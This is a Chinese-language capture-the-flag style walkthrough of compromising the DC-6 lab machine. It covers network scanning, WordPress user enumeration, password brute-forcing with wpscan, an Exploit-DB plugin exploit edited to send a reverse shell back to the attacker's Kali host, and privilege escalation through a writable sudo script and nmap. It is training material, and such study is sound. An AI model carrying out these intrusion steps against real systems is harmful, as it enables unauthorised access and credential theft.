靶机所需环境
- 目标靶机:DC-6(192.168.160.180)
- 攻击机:Kali Linux(192.168.160.176)
信息收集
- 打开靶机,记得开启NAT模式,扫描网段下存活IP;
arp-scan -l
- 扫描IP开放的端口及其服务信息;
nmap -sV -O 192.168.160.180
- 通过指纹识别发现靶机使用是CMS的
wordpress
内容管理系统;
whatweb -v 192.168.160.180
- 访问靶机下的80端口但发现找不到该网站,查阅了下资料发现原因是因为解析不了该域名,在
/etc/hosts
里添加一条指定一下即可;
- 这下就成功访问到了服务(小插曲:这小伙子看着面熟啊😂),一顿回想后发现和之前的DC-2靶机页面相似;
- 页面尝试寻找突破点,发现多次出现
Plugins
插件这个单词,猜测可能是插件存在漏洞;
- 还是扫描下页面目录叭,成功发现登录页面,同时还发现一点信息——
W
标志,进一步验证使用了CMS的wordpress
内容管理系统;
爆破用户密码
- 尝试爆破下账号密码,成功爆破出5个用户;
wpscan --url http://wordy -e u
- 用户有了,接下来就是密码了,使用kali自带的密码文件进行爆破,将其解压并复制到当前目录下;
gunzip /usr/share/wordlists/rockyou.txt.gz rockyou.txt
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt
- 将用户保存为user.txt,用户和密码文件都有了下一步就不用我多说了叭,直接爆破;
wpscan --url http://wordy -U user.txt -P passwords.txt
- 成功爆破出一个用户和密码来了;
用户: mark
密码: helpdesk01
漏洞利用
- 用户登录后,这次咱目的明确直接怼着
"插件"
来找突破点;
- 发现一个活动监视器的插件,直接
searchsploit
搜索下对应文件,然后使用-p
参数查看下文件的路径;
searchsploit activity monitor
searchsploit -p php/webapps/45274.html
- 知道路径就好办啦,将文件复制到当前目录下,并修改下里面的内容;
cp /usr/share/exploitdb/exploits/php/webapps/45274.html .
// "."的意思是当前目录
localhost:8000 改为 wordy
nc -nlvp 127.0.0.1 改为 nc 192.168.160.176(kali的IP)
- 保存后退出,kali先监听9999端口,接着访问下
45274.html
文件,点击成功反弹shell至kali机上,进行下shell交互方便操作;
python -c 'import pty;pty.spawn("/bin/bash")'
用户提权
- 进入
/home/mark/stuff
目录下,查看文件成功发现graham
用户的密码;
用户: graham
密码: GSo7isUM1D4
- 切换至
graham
用户查看可以执行的操作,发现jens
用户下有个backups.sh
文件,查看是个备份文件;
- 往
backups.sh
文件里写入/bin/bash
并以jens
的身份去执行该文件,成功切换至jens
用户,再次查看可以执行的操作发现可以无密码使用nmap
命令;
- 查阅了下资料发现可以写个
getshell
文件,然后以nmap
命令去执行 ,即可提权至root
;
上一篇 > DC-5靶机渗透测试
下一篇 > DC-7靶机渗透测试
以上内容就是DC-6靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!
以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍